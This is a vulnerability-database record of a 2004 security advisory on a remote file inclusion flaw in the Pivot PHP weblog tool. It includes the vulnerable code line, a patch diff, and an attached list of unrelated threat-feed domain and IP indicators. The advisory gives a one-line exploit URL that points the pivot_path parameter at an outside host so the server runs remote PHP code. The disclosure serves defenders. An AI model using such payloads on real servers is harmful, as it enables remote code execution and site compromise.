ID SECURITYVULNS:DOC:6366 Type securityvulns Reporter Securityvulns Modified 2004-06-18T00:00:00
Description
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web
site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
Pivot Remote Code Execution Vulnerability
SUMMARY
" <http://www.pivotlog.net/> Pivot is a web-based tool to help you
maintain dynamic sites, like weblogs or online journals. Pivot is released
under the GPL so it is completely free to use. It is written in PHP, and
does not require additional libraries or databases to function".
Remote code execution is possible through Pivot by remote file inclusion.
Malicious PHP code can then be executed under the privileges of the user
running the PHP scripts running Pivot.
DETAILS
Vulnerable Systems:
* Pivot version 1.10
Immune Systems:
* Pivot version 1.14
The vulnerability lies within the class file called module_db.php that can
be accessed individually. By supplying a fake path, the attacker is able
to include any file desirable, which could also contain malicious PHP
code. The code is running at the context of the user normally running the
Pivot scripts. A small code excerpt is shown below:
// for now, we'll just use the xml / flat-file module..
include_once $pivot_path."modules/module_db_xml.php";
class db {
No check of filtering whatsoever is performed in module_db.php, assuming
that it is only called from known locations with well-formed input.
However, the file can be accessed individually. These two factors give
rise to the security issue.
The idea behind this is to include this file somewhere else within the
code execution so that $pivot_path is properly set. However if
register_globals is set to on within php.ini the attacker is able to
hijack the variable $pivot_path and point it to somewhere else
("http://xxxxx/includes/module_db_xml.php".)
A simple way to exploit the vulnerability might look something along the
lines of:
http://xxxxx/pivot/modules/module_db.php?pivot_path=http://xxxxxx
Patch Availability:
A new version of Pivot is available for download. Users are highly advised
to perform the transition. If for some reason they choose not to, the
following fix can be applied to remedy the situation:
--- module_db.php Wed Feb 11 16:29:04 2004
+++ module_db.phpfix Fri May 28 22:36:07 2004
@@ -10,6 +10,10 @@
// Patch to fix remote include - loofus (0x90)
//
+/ Make sure user cannot include remote files /
+if(isset($_GET['pivot_path']) || isset($_POST['pivot_path']) ||
isset($_COOKIE['pivot_path']))
+ die("No remote include for you!\n");
+
// for now, we'll just use the xml / flat-file module..
include_once $pivot_path."modules/module_db_xml.php";
ADDITIONAL INFORMATION
The information has been provided by ">loofus.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.
{"id": "SECURITYVULNS:DOC:6366", "bulletinFamily": "software", "title": "[UNIX] Pivot Remote Code Execution Vulnerability", "description": "The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web\r\nsite: http://www.securiteam.com\r\n- - promotion\r\n\r\nThe SecuriTeam alerts list - Free, Accurate, Independent.\r\n\r\nGet your security news from a reliable source.\r\nhttp://www.securiteam.com/mailinglist.html \r\n\r\n- - - - - - - - -\r\n\r\n\r\n\r\n Pivot Remote Code Execution Vulnerability\r\n------------------------------------------------------------------------\r\n\r\n\r\nSUMMARY\r\n\r\n" <http://www.pivotlog.net/> Pivot is a web-based tool to help you \r\nmaintain dynamic sites, like weblogs or online journals. Pivot is released \r\nunder the GPL so it is completely free to use. It is written in PHP, and \r\ndoes not require additional libraries or databases to function".\r\n\r\nRemote code execution is possible through Pivot by remote file inclusion. \r\nMalicious PHP code can then be executed under the privileges of the user \r\nrunning the PHP scripts running Pivot.\r\n\r\nDETAILS\r\n\r\nVulnerable Systems:\r\n * Pivot version 1.10\r\n\r\nImmune Systems:\r\n * Pivot version 1.14\r\n\r\nThe vulnerability lies within the class file called module_db.php that can \r\nbe accessed individually. By supplying a fake path, the attacker is able \r\nto include any file desirable, which could also contain malicious PHP \r\ncode. The code is running at the context of the user normally running the \r\nPivot scripts. A small code excerpt is shown below:\r\n// for now, we'll just use the xml / flat-file module..\r\n include_once $pivot_path."modules/module_db_xml.php";\r\n\r\n class db {\r\n\r\nNo check of filtering whatsoever is performed in module_db.php, assuming \r\nthat it is only called from known locations with well-formed input. \r\nHowever, the file can be accessed individually. These two factors give \r\nrise to the security issue.\r\n\r\nThe idea behind this is to include this file somewhere else within the \r\ncode execution so that $pivot_path is properly set. However if \r\nregister_globals is set to on within php.ini the attacker is able to \r\nhijack the variable $pivot_path and point it to somewhere else \r\n("http://xxxxx/includes/module_db_xml.php".)\r\n\r\nA simple way to exploit the vulnerability might look something along the \r\nlines of:\r\nhttp://xxxxx/pivot/modules/module_db.php?pivot_path=http://xxxxxx\r\n\r\nPatch Availability:\r\nA new version of Pivot is available for download. Users are highly advised \r\nto perform the transition. If for some reason they choose not to, the \r\nfollowing fix can be applied to remedy the situation:\r\n--- module_db.php Wed Feb 11 16:29:04 2004\r\n+++ module_db.phpfix Fri May 28 22:36:07 2004\r\n@@ -10,6 +10,10 @@\r\n // Patch to fix remote include - loofus (0x90)\r\n //\r\n\r\n+/* Make sure user cannot include remote files */\r\n+if(isset($_GET['pivot_path']) || isset($_POST['pivot_path']) ||\r\n isset($_COOKIE['pivot_path']))\r\n+ die("No remote include for you!\n");\r\n+\r\n // for now, we'll just use the xml / flat-file module..\r\n include_once $pivot_path."modules/module_db_xml.php";\r\n\r\n\r\nADDITIONAL INFORMATION\r\n\r\nThe information has been provided by ">loofus.\r\n\r\n\r\n\r\n======================================== \r\n\r\n\r\nThis bulletin is sent to members of the SecuriTeam mailing list. \r\nTo unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com \r\nIn order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com \r\n\r\n\r\n==================== \r\n==================== \r\n\r\nDISCLAIMER: \r\nThe information in this bulletin is provided "AS IS" without warranty of any kind. \r\nIn no event shall we be liable for any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages. \r\n\r\n\r\n\r\n", "published": "2004-06-18T00:00:00", "modified": "2004-06-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6366", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:10", "edition": 1, "viewCount": 66, "enchantments": {"score": {"value": 2.0, "vector": "NONE", "modified": "2018-08-31T11:10:10", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1318.NASL", "EULEROS_SA-2020-1323.NASL", "EULEROS_SA-2020-1314.NASL", "DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL", "EULEROS_SA-2020-1299.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201314", "OPENVAS:1361412562311220201299", "OPENVAS:1361412562311220201323", "OPENVAS:1361412562311220201318", "OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "zdt", "idList": ["1337DAY-ID-34153", "1337DAY-ID-34159", "1337DAY-ID-34134"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10149"]}, {"type": "kitploit", "idList": ["KITPLOIT:1907207623071471216"]}, {"type": "mssecure", "idList": ["MSSECURE:057ED5C1C386380F0F149DBAC7F1F6EF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156729"]}], "modified": "2018-08-31T11:10:10", "rev": 2}, "vulnersScore": 2.0}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-01-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **pathup[.]co** in [RST Threat Feed](https://rstcloud.net/profeed) with score **3**.\n First seen: 2020-03-04T03:00:00, Last seen: 2021-01-24T03:00:00.\n IOC tags: **spam**.\nDomain has DNS A records: 193[.]0.14.129,202.12.27.33,192.112.36.4,199.7.83.42\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-03-04T00:00:00", "id": "RST:969A6954-6366-36F2-A322-B6AFC93E87D0", "href": "", "published": "2021-01-25T00:00:00", "title": "RST Threat feed. IOC: pathup.co", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **tesmachinesasousenligne[.]fr** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-24T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:E6389C9D-6366-332F-86A9-3DF46313A39E", "href": "", "published": "2021-01-25T00:00:00", "title": "RST Threat feed. IOC: tesmachinesasousenligne.fr", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **mediaserviceforupgrades[.]review** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-24T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:AF91CB6F-6366-3461-931A-C4CA9D902273", "href": "", "published": "2021-01-25T00:00:00", "title": "RST Threat feed. IOC: mediaserviceforupgrades.review", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **microsft0x8024f009aus[.]ml** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-24T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:98E1F26F-6366-3FEA-A0DE-CEBB78845ED4", "href": "", "published": "2021-01-25T00:00:00", "title": "RST Threat feed. IOC: microsft0x8024f009aus.ml", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **https[.]secure.bankofamerica.login.sign.woflwyfnpu.underpains.duckdns.org** in [RST Threat Feed](https://rstcloud.net/profeed) with score **22**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-24T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 172[.]81.132.128\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:D0EF7597-6366-36B5-8E23-C1643C5F004B", "href": "", "published": "2021-01-25T00:00:00", "title": "RST Threat feed. IOC: https.secure.bankofamerica.login.sign.woflwyfnpu.underpains.duckdns.org", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **ghousiasports[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2019-12-19T03:00:00, Last seen: 2021-01-24T03:00:00.\n IOC tags: **generic**.\nWhois:\n Created: 2020-03-17 14:50:07, \n Registrar: unknown, \n Registrant: Chengdu West Dimension Digital Technology Co Ltd.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-19T00:00:00", "id": "RST:8009C2F6-6366-3AD8-8883-1E8DD29F8DEF", "href": "", "published": "2021-01-25T00:00:00", "title": "RST Threat feed. IOC: ghousiasports.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **60[.]139.123.222** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **9**.\n First seen: 2020-08-03T03:00:00, Last seen: 2021-01-24T03:00:00.\n IOC tags: **tor_node**.\nASN 17676: (First IP 60.123.0.0, Last IP 60.159.255.255).\nASN Name \"GIGAINFRA\" and Organisation \"Softbank BB Corp\".\nASN hosts 8072 domains.\nGEO IP information: City \"\", Country \"Japan\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-03T00:00:00", "id": "RST:55D9616E-6366-311A-9924-E0B94ECCEA54", "href": "", "published": "2021-01-25T00:00:00", "title": "RST Threat feed. IOC: 60.139.123.222", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-24T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **211[.]151.26.4** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **33**.\n First seen: 2021-01-24T03:00:00, Last seen: 2021-01-24T03:00:00.\n IOC tags: **generic**.\nASN 23724: (First IP 211.151.6.0, Last IP 211.151.83.255).\nASN Name \"CHINANETIDCBJAP\" and Organisation \"IDC China Telecommunications Corporation\".\nASN hosts 84029 domains.\nGEO IP information: City \"\", Country \"China\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-24T00:00:00", "id": "RST:EC9CCAC8-6366-391C-9279-AD54FC9FB29A", "href": "", "published": "2021-01-25T00:00:00", "title": "RST Threat feed. IOC: 211.151.26.4", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **allabouteyecare[.]org** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-23T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:7F226083-6366-3671-A427-746790EF3E47", "href": "", "published": "2021-01-24T00:00:00", "title": "RST Threat feed. IOC: allabouteyecare.org", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-23T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **rudolfsvatek[.]cz** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-23T03:00:00.\n IOC tags: **generic**.\nWhois:\n Created: 2015-05-18 19:17:10, \n Registrar: REGWEDOS, \n Registrant: unknown.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:1554C770-6366-3532-A144-1A19DAA43119", "href": "", "published": "2021-01-24T00:00:00", "title": "RST Threat feed. IOC: rudolfsvatek.cz", "type": "rst", "cvss": {}}]}
